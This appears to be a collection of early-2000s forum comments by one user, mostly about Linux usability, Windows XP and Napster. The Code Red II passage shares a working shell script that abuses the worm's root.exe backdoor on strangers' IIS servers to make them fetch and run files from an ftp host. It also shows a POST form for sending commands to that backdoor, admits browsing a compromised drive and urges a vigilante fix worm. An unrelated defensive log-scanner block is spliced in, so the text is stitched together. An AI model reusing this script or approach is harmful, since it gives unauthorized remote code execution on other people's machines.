Or any Java applet that does a "security, management, or optimization" function? Or a javascript file that does this? Wtf is an "automatically executing software package".. that is so vague and could be anything from an HTML page ('execution' meaning 'render') to an .exe file. If it's an .exe file, then it doesn't "automatically execute", it is executed by the user.
I love how they use vague terms such as "automatically executing software package" and "markup language" in order to make sure they have all the bases covered, not just their stupid (probably buggy) solution that uses a specific type of software package and a specific type of markup language.
I'm 20 years old and EVERYONE I interact with at college occasionally uses the word ghetto as an adjective. Giving me the teenager skript kiddie treatment really pisses me off.
People who decide that it's their personal responsibility to dictate what is offensive to others (and in turn try to restrict others from causing offense) are usually low on self esteem themselves and have nothing better to do. I'm sure a Jewish grandmother would be having a heart attack when she saw you stereotyping her as giving a shit about the use of the word ghetto. Good job bringing the Nazis into this, BTW.
My problem wasn't with "getting used to the environment".. I know that's part of the learning curve you encounter whenever you start with a new version of an OS. My problem was the damn thing just feels slow and unresponsive.. like when your car needs new brakes or something.
If you do not feel in control of the computer, you cannot get any work done because you have a feeling of helplessness. This is a fundamental principle of GUI design, and was something I encountered with Mandrake.
You've got to be kidding me thinking that I could just tar up a few directories and unload them a few months later on a completely different distro, etc. Every distro I've installed, and every install I've done at different times, have required different subtleties in the way they are set up on the filesystem and things like that.
Linux changes fast and often, and a negative result of this is that there is really no "one way" that distributions have settled on doing something even as simple as startup scripts.
Don't whine about W98, it is a piece of shit and everyone knows it. We're talking about XP/2k here.
I think you can get rid of that preview if you turn off the display folders as web view or whatever, but I might be mistaken.
I was basically playing with simple stuff like terminal sessions, GUI file manipulation, GNOME configuration, etc. I toyed with the GIMP a bit, played with StarOffice, etc. At the end of a few hours of playing I came to the conclusion that the annoying feeling of waiting, sluggishness, and the subsequent helplessness that comes when you are unable to feel in control of a GUI outweighed my urge to run an open source OS for real. The GUI is still fundamentally ugly as well, but that wasn't my real motivation for fdisking the thing off my drive.
I'd love to get away from MS as much as the next guy, but their OS is still superior in terms of usability, and until the gap is lessened a considerable amount, I simply can't bear to run Linux.
I run linux for my server for half-empty. I'm far from "too stupid" to run Linux. Regardless, the topic at hand here is ease of use, and ease of use, whether you like it or not, is the concept of making a system that "stupid" people can use.
I said that it would be possible for my Mandrake install to become usable if I tweaked it to hell and back (like I have done in the past with Debian, Slack, Redhat, etc.) but I didn't feel like it this time; I didn't feel it was worth my effort.
The "you don't have to use it if you don't want to" comments here are pretty lame, and in this case, totally inapplicable. Since we're talking about ease of use stuff like network detection (which, despite the author's assertion, has been there since win95) we're not talking about me here, a geek, we're talking about the proverbial Joe Sixpack. It might be hard for you to fathom, but I *would* like to see Linux succeed, and I do feel that it is a success in the server world. However, it's delusional to think that XP is copying Linux. It needed to be said, so I said it.
I don't know much about what XP "phones home" or whatever, but you can switch the GUI back to classic mode, which I'm guessing gets rid of the slowdown(s).
That comment about XP copying Linux is pretty funny. I know I'll get modded to hell for saying this, but I just have to. I just recently installed Mandrake on a separate drive and had to nuke the whole thing after an evening of use. Basically, I try Linux on the desktop every couple months to see if it's finally getting usable. It only took me a few hours to realize Mandrake is nowhere near usable.. out of the box it's slow, the apps are still as ghetto as they were 6 months ago (When I tried running Debian on the desktop) and it just plain sucks to use. Perhaps it was because I was using GNOME, but regardless, to say XP is stealing the great features of Mandrake is simply ridiculous. (The link to the article is dead, so I can't get into much detail) It's possible that if I had tweaked the system on a geek level and didn't use GNOME it would have been better, but I simply didn't want to waste my time once again doing the "week long Linux march" that I do whenever I decide to install it. I'll never use Linux on the desktop until I can just install it and have it work and be FAST. I was impressed with how easily Mandrake installed, but the fireworks stopped as soon as it came time for me to actually get some work done.
And, yes, I've run linux on the desktop for months at a time in the past, so I'm not a newbie and I do have a good sense of how usable the system is going to be for me in the long run based upon playing with it for a few hours.
XP doesn't require a Passport account, and it is damn usable. The new GUI is pretty damn good, IMHO, and for the guy who referred to the taskbar being for idiots or whatever, well, you can hide it. It's configurable for the experienced and it took me about 10 minutes to turn off all the dumbing down features that are in there for the computer illiterate. One thing MS does do right is understand that not everyone is a geek.. and this is why Linux will never become mainstream unless a well off company comes in and takes it under its wing and starts a massive usability testing campaign. For example, I found the most functional and well designed apps to be (although they were notoriously slow) evolution and nautilus, and, surprise surprise, they were designed and created by companies.
The geeks will always design for geeks, which is all well and good, but don't go saying that Microsoft products are playing catch up to Linux in ease of use. That's just ridiculous:)
Yeah I realize that. I'm not doing anymore "work" on this, but I figured I might as well post it. I figure I painted myself red enough on one or two win2k cable modems for one lifetime now.
The intention isn't the same as crackers though; writing a script to patch and restart IIS is not an in-your-face "showing their vulnerabilities" crack, it's basically a free-of-charge windows update compliments of whoever runs the script. I'm not saying that it is legal, but it's definitely not a "ha ha I got rewt your windows box is insecure" crack. It's a "I noticed your computer is insecure, I fixed it. Have a nice day, and don't let it happen again." crack.
If anyone actually sat and wrote a complex script to fix these computers, I *highly* doubt that a sane judge would pound the gavel on them, especially if the good they do is significant enough and measurable. (Personally, I would *love* to see someone outside of Microsoft do this before MS gets the chance to issue a fix and once again look like the good guys even though it's their original fuck up.)
(Copied from the other thread, for those who are working on a way to fix this worm)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $FTP and $DIR values to
# the ftp and directory of the patch and shutdown repository
# (values are URL-encoded because they are sent inside the query string)
# For ftp.youhavesetup.com
FTP="ftp%2eyouhavesetup%2ecom"
# Directory /pub/cr
DIR="%2fpub%2fcr"
# Each request runs root.exe (the worm's copy of cmd.exe) with the decoded
# arguments; the first three lines build an ftp script 'tmpfile' on the target:
#   /c echo bin >tmpfile
echo "GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile" | telnet $1 80
sleep 1
#   /c echo get $DIR/$2 >>tmpfile
echo "GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3etmpfile" | telnet $1 80
sleep 1
#   /c echo ftp -A -s:tmpfile $FTP >dlfile.cmd   (anonymous ftp driven by tmpfile)
echo "GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfile+$FTP+%3edlfile%2ecmd" | telnet $1 80
sleep 1
#   /k dlfile.cmd   (run the generated batch file, which performs the download)
echo "GET /scripts/root.exe?+/k+dlfile%2ecmd" | telnet $1 80
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this any more :)
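Added defender-side example, not the poster's code: every request the script above sends to root.exe is recorded in the victim's IIS log, so scanning the log for requests whose cs-uri-stem is a shell executable (root.exe, or cmd.exe through the /c and /d virtual roots the worm creates) is the quickest way for an administrator to confirm a compromise and see what was run. The log lines, field layout and addresses below are constructed samples, not captured traffic.

```python
"""Flag requests to the Code Red II backdoor shells (root.exe / cmd.exe) in IIS W3C logs."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Executables that Code Red II exposes through IIS: the worm's root.exe copy of the
# Windows shell, or cmd.exe itself reached through the /c and /d virtual roots it adds.
SHELL_RE = re.compile(r"(?:^|/)(?:root|cmd)\.exe$", re.IGNORECASE)

# Constructed sample log (IIS W3C extended format); not captured traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-08-05 03:12:44 192.0.2.10 GET /default.htm - 200
2001-08-05 03:12:51 192.0.2.77 GET /scripts/root.exe +%2fc+echo+bin+%3etmpfile 200
2001-08-05 03:12:52 192.0.2.77 GET /scripts/root.exe +%2fc+echo+get+%2fpub%2fcr%2fpatch.exe+%3e%3etmpfile 200
2001-08-05 03:12:53 192.0.2.77 GET /scripts/root.exe +/k+dlfile%2ecmd 200
2001-08-05 03:13:01 192.0.2.99 GET /c/winnt/system32/cmd.exe /c+dir 200
2001-08-05 03:13:05 192.0.2.10 GET /images/logo.gif - 200
"""


def parse_w3c(log_text):
    """Yield one dict per request line, using the #Fields: header to name the columns."""
    fields = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields: header
        values = line.split(" ", len(fields) - 1)
        if len(values) != len(fields):
            continue  # truncated or malformed record
        yield dict(zip(fields, values))


def find_backdoor_requests(log_text):
    """Return the requests that hit a shell executable, with the decoded command line."""
    hits = []
    for rec in parse_w3c(log_text):
        stem = rec.get("cs-uri-stem", "")
        if not SHELL_RE.search(stem):
            continue
        query = rec.get("cs-uri-query", "-")
        # IIS writes '-' for an empty query; '+' and %xx escapes encode the cmd.exe arguments.
        command = "" if query == "-" else unquote_plus(query).strip()
        hits.append({
            "client": rec.get("c-ip", "?"),
            "stem": stem,
            "command": command,
            "status": rec.get("sc-status", "?"),
        })
    return hits


def clients_by_hit_count(hits):
    """Count backdoor requests per client address, most active first."""
    return Counter(h["client"] for h in hits).most_common()


if __name__ == "__main__":
    found = find_backdoor_requests(SAMPLE_LOG)
    for h in found:
        print(f"{h['client']} {h['stem']} -> {h['command']!r} (HTTP {h['status']})")
    print(clients_by_hit_count(found))
```

A 200 status on such a request means the shell ran; a host that logs these should be treated as fully compromised, not merely patched.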
I've noticed that a lot of the infected servers are 403'ing me ("Too Many Connected Users") so I'm guessing that once our Chinese (or, for you conspiracy theorists, Microsoft employee) buddies get their stuff set up on their 0wned boxes they turn IIS to allow one connection only or something to block everyone else besides them out.
The obvious conclusion is that they're setting up for a DoS or something. Sucks to be the target they should choose.. 100,000 UDP packet sources anyone? Eerk.
Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.
I'm also guessing that right now a bunch of /.'ers are doing one of two things:
1) Writing scripts to make things suck more for those who have been compromised (shame on you)
or
2) Writing scripts to fix the compromised servers
I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmins and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and an even more malicious virus (which, say, deletes the entire contents of the drives or something) will be unleashed soon enough.
So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.
Has anyone figured out how to execute commands using a POST request to root.exe? My curiosity (heh heh :)) has made me play with it a bit (but not too much, don't want the feds knocking on my door asking me what the phrase "Hacked by Chinese!" means to me).. I can't seem to figure it out.
I tried variants of the following:
<HTML>
<BODY>
<FORM METHOD="POST" ACTION="http://xx.xx.xx.xx/scripts/root.exe">
<INPUT TYPE="SUBMIT" NAME="" VALUE="exit ">
</FORM>
</BODY></HTML>
trying to send exit to the shell, but the "script" (root.exe) never finishes. I'm guessing that the data is coming over the pipe but lynx won't show it to me until the request is finished. I tried passing the NAME %1, %2, etc. (DOS style) but that didn't work either.
As soon as I get a directory listing I am going to have a moment of silence for all these poor fucks.
I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per se, but perhaps the old code red does something to tell the new code red to "come here" or something?
The fact the old code red is turned off tells me that they might be linked to the same person/organization or something.. if I were some independent cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.
I bet they launched it on Saturday morning on purpose (or Friday night even.) By the time Sunday is over, the hacker(s) will have root access to a shitload of computers, and the sysadmins who hesitated patching showing up Monday morning will have long been 0wned.
Like someone said elsewhere, the best (and only, I think) way to partially fix this problem is to write a variant of the worm (Code Green? :)) that fixes all the servers before it gets out of hand. Apache server or not, if 100,000 computers are infected, the traffic costs of Code Red 1, 2, etc. hits alone will be enough of an incentive to fix the IIS servers. (Though it is kind of exciting to think of Microsoft having egg on their faces Monday morning when they get DoSed by 100,000 cable modems in one deafening yell.. but I digress)
The author obviously wasn't a script kiddie. It takes a good amount of brains to code that little beast.
It was obviously a warning. It was not a perlscript that did some silly exploit, it was a hand crafted and well designed virus that did what it was supposed to do, scare the shit out of us.
I don't understand why they don't all jump ship and do something else. It's plain obvious that they're never going to be "allowed" to do what they want to do. They'll keep bringing them to court until they run out of money. Is it because they have investors who will break their legs and other bits if they fail completely?
This is getting ridiculous. First they filter everything.. and just when you thought that the RIAA et al couldn't pick on them any worse they decide they should switch away from MP3. They might as well just have a court rule that Napster can no longer use electricity in their operations. Are you kidding me? I'm guessing the number of people who will be using Napster when they make the switch will be countable on my fingers and toes, if that. I don't think the Winamp developers and other players will bother implementing a codec for this crap, and even if Napster makes one, I doubt they'd even include it since it's just plain stupid.
Ok first off I am not an "open source person":) Secondly, the Ogg Vorbis idea is not something I would ever have the time, energy, or resources to do.
Anyway, the concept would basically be two things. Take the gnutella network and 1) Make a client that looked and felt exactly like Napster and 2) (not necessary) filter all but Ogg Vorbis files. Perhaps make it an alternative network for speed reasons. The problem with the "geek" clients such as gnutella et al not being used by the average dude like Napster was is because they're unaware that they exist or they're too hard to use. If you made a Napster replacement using gnutella you would get around the legal repercussions (no central server, nobody can shut it down) while letting all the ex-Napster users jump right in. The RIAA couldn't go after anyone except the software developer, and even then, they have no case since the software developer isn't running the network.
Filtering in the Ogg Vorbis stuff exclusively would be an additional benefit in getting the .ogg format to be the standard instead of .mp3.. not necessarily my goal (I'm too busy running a site and building another) but a goal many "open source people" have undoubtedly.
Cry me a river.
Thanks.
Holy shit.
In the root directory of the drive there's an HTML file with the "Fuck USA goverment" tag or whatever. I am not doing anymore snooping.
The shit has hit the fan, ladies and gents.
(+1: First /. post to make me laugh aloud in a long time [besides trolls, of course])
You.SenseOfHumor() == null
Open source commodity software is devoid of bugs.
Riiiiight.
For all of 'em:
:)
Chinese "Code Red" Internet Worm misses White House, Microsoft issues fix
Because of course, this is the most positive way to word it for M$
I kind of feel bad for them, though.
You know, IntelliNaming and ActiveConventions are worse.